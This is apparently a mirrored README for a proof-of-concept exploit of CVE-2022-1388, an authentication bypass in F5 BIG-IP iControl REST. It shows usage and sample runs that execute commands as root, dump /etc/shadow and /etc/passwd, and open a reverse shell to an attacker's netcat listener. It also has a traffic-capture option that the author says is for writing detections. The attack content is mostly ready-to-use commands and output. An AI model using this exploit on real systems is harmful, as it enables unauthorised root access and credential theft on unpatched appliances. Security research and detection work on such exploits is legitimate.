Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)Description:On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Description
-- FOR EDUCATIONAL USE ONLY -- Proof-of-Concept RCE for CVE-2022-1388, plus some added functionality for blue and red teams
Readme
# CVE-2022-1388 RCE, Reverse Shell, and Auto-Export PCAP
### -- FOR EDUCATIONAL USE ONLY --
The author is not responsible or held liable for any actions taken with any aspect of this project/repository. I created this for the purposes of understanding the attack as well as writing detections within a SIEM and wanted to share for others to do the same. Use at your own risk.
This exploit targets the BIG-IP iControl REST vulnerability CVE-2022-1388 in F5 Systems. Please see the F5 advisory (https://support.f5.com/csp/article/K23605346) for affected versions and other information.
Feel free to PR or report any issues. This was tested on a few vulnerable F5 VE in Google Cloud from a CentOS machine with Python 3.6
## Usage
```
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET, --RHOSTS TARGET
Target IP of vulnerable BIG-IP system
-p PORT, --port PORT, --RPORT PORT
Target port on vulnerable BIG-IP system
-c CMD, --cmd CMD, --command CMD
Command to run on target system
-e, --export, --tcpdump
Export captured traffic and ssl-key.log | **Requires sudo privileges!
-q, --quiet Don't display banner
-s, --shell Launch an interactive shell
-lh LHOST, --lhost LHOST, --LHOST LHOST
Required for -s [shell]; Local IP/interface to bind listener to
-lp LPORT, --lport LPORT, --LPORT LPORT
Required for -s [shell]; Local port to bind listener to
```
## Remote Code Execution
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]
```
## Reverse shell
```
Attacker:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...
[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root
```
## Exporting a PCAP for analysis
Specifiying the -e (--export) flag will create two files: detection.pcap and ssl-key.log. These files will be overwritten every time the -e flag is specifed, so remember to move or rename the files you wish to keep. The ssl-key.log can be imported into Wireshark via Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename to decrypt the TLS session. Note that because of tcpdump, when using -e, the script must be run as sudo.
```
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]
```
Before TLS Decryption:
<img width="784" alt="Wireshark 01" src="https://user-images.githubusercontent.com/58718722/209455397-a686fdc0-1b8e-408b-908b-0280166bf7d1.png">
Adding the automatically-exported ssl-key.log to the TLS preferences in Wireshark:
<img width="784" alt="Wireshark Preferences" src="https://user-images.githubusercontent.com/58718722/209455234-2cbfede9-0a89-4386-a362-7c1e37a67f29.png">
After TLS Decryption:
<img width="784" alt="Wireshark 02" src="https://user-images.githubusercontent.com/58718722/209455422-d22c87a9-be84-4262-a217-30621b67c89b.png">
<img width="728" alt="Wireshark 03" src="https://user-images.githubusercontent.com/58718722/209455326-751bc49a-a147-499d-b0c9-c6119668f5e9.png">
File Snapshot
[4.0K] /data/pocs/e0cf15ae7a20b2877e3c4326c41860e547cdf6f6
├── [6.9K] CVE-2022-1388.py
└── [5.1K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →